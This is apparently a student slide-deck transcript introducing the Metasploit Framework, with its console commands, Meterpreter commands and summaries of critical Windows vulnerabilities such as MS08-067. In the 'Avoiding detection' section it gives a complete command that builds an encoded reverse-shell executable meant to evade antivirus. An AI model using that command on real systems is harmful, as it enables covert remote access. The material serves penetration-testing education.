metaploit framework
TRANSCRIPT
MetasploitFramework
Lê Đức Quyền 08130075Cao Ngô Nhật thanh 08130081
What is Metasploit?
• “The Metasploit Framework is an advanced open-source
for attacking, testing, and using exploit code.”
• Metasploit software helps security and IT professionals
identify security issues, verify vulnerability in system.
• Perform penetration tests
• Overt penetration testing
• Covert penetration testing
• Consists of tools, libraries, modules, and user
interfaces. These are configured and combined to
launch an exploit.
• Written in Ruby.
• Professional approach to penetration testing:– Automation– Reconnaissance, exploitation.
• All in one Solution– Multi-platform– Diverse range of target applications
• Open Source– Custom payloads
Motivation
Metasploit Architecture
• Choose module exploit:
• show exploits: list available exploits within the framework
• use exploit_name: choose exploit
• info exploit_name: view information about exploit
• Choose payload
• Show payloads: show only the payloads that are com-patible with
chosen module.
• Info payload_name: view detail information about payload
• set payload payload_name: choose payload
Metaploit Framework Command
Metaploit framwork command
• Configure chosen payload.
• show options: view the options which you must configure
• set option_name value: configure option
• show advanceds: show advance options
• check: verify options are configured whether exactly or not
• show targets: list vulnerable potential targets.
• set TARGET value: choose target.
• exploit: initiates our exploit and attempts to attack the target
Meterpreter Meterpreter, short for The Meta -Interpreter is an
advanced payload that is included in the Metaploit
Framework. Its purpose is to provide complex command
for exploiting and attacking remote machine. The way that
it accomplishes this is by allowing developers to write their
own extensions in the form of shared object (DLL) files
that can be uploaded and injected into a running process
on a target computer after exploitation has occurred.
Meterpreter payload
• Fs: Provides interaction with the filesystem on the remote machine.
• Net: Provides interaction with the network stack on the remote machine.
• Process: Provides interaction with processes on the remote machine .
• Sys: Provides interaction with the environment on the remote machine
Basic Meterpreter Command
• screenshot: capture desktop screen of victim
• sysinfo: view information about platform of
victim
• meterpreter > sysinfo
Computer: IHAZSECURITY
OS : Windows XP (Build 2600, Service Pack
2).
Arch : x86
Language: en_US
Basic Meterpreter Command
• execute: executes a process on the remote
endpoint
• kill: terminate one or more processes on the
remote endpoint
• Ps: list processes on the remote endpoint
Basic meterpreter command
Meterpreter> execute -f cmd –c execute: success, process id is 3516. execute: allocated channel 1 for new process.meterpreter> interact 1 interact: Switching to interactive
console on 1... interact: Started interactive
channel 1. Microsoft Windows XP [Version
5.1.2600] (C) Copyright 1985-2001 Microsoft
Corp. C:\WINDOWS>ipconfig
Avoiding detection
• Encoding payload with MSFencode
root@bt:/# msfpayload windows/shell_reverse_tcp
LHOST=192.168.1.101 LPORT=31337 R |msfencode -e
x86/shikata_ga_nai -t exe > /var/www/payload2.exe
• Multi-encoding: allows the payload to be encoded several
times to throw off antivirus programs
Critical vulnerability
MS08-067 - Critical• Vulnerability in Server Service Could Allow Remote
Code Execution (958644)• The vulnerability could allow remote code execution if an
affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code.
• Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter. http://technet.microsoft.com/en-us/security/bulletin/ms08-067
MS04-011-CriticalLSASS Vulnerability - CAN-2003-0533
Impact of vulnerability: Remote Code Execution
An attacker who successfully exploited the most severe of
these vulnerabilities could take complete control of an
affected system, including installing programs; viewing,
changing, or deleting data; or creating new accounts that
have full privileges.
This vulnerability is caused by an unchecked buffer in the
LSASS service.
http://technet.microsoft.com/en-us/security/bulletin/ms04-0
11
MS10-061 - Critical• This is a remote code execution vulnerability. An attacker who successfully
exploited this vulnerability could take complete control of an affected
system. An attacker could then install programs; view, change, or delete
data; or create new accounts.
• Systems are only vulnerable to remote attack when sharing a printer and
the remote attacker can access the printer share.
• This vulnerability is caused when the Windows Print Spooler insufficiently
restricts user permissions to access print spoolers.
• Firewall best practices and standard default firewall configurations can help
protect networks from attacks that originate outside the enterprise
perimeter. Best practices recommend that systems that are connected to
the Internet have a minimal number of ports exposed.
• http://technet.microsoft.com/en-us/security/bulletin/MS10-061
MS03-026-Critical• This vulnerability is caused by the Windows RPCSS service does not
properly check message inputs under certain circumstances. After
establishing a connection, an attacker could send a specially crafted
malformed RPC message to cause the underlying Distributed Component
Object Model (DCOM) process on the remote system to fail in such a way
that arbitrary code could be executed.
• To exploit this vulnerability, the attacker would require the ability to send a
specially crafted request to port 135, 139, 445 or 593 or any other
specifically configured RPC port on the remote machine.
• Best practices recommend blocking all TCP/IP ports that are not actually
being used
• A remote code execution vulnerability exists in the ActiveX control for the Snapshot Viewer for Microsoft Access. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user.
• http://technet.microsoft.com/en-us/security/bulletin/MS08-041
MS10-046 - Critical
DEMO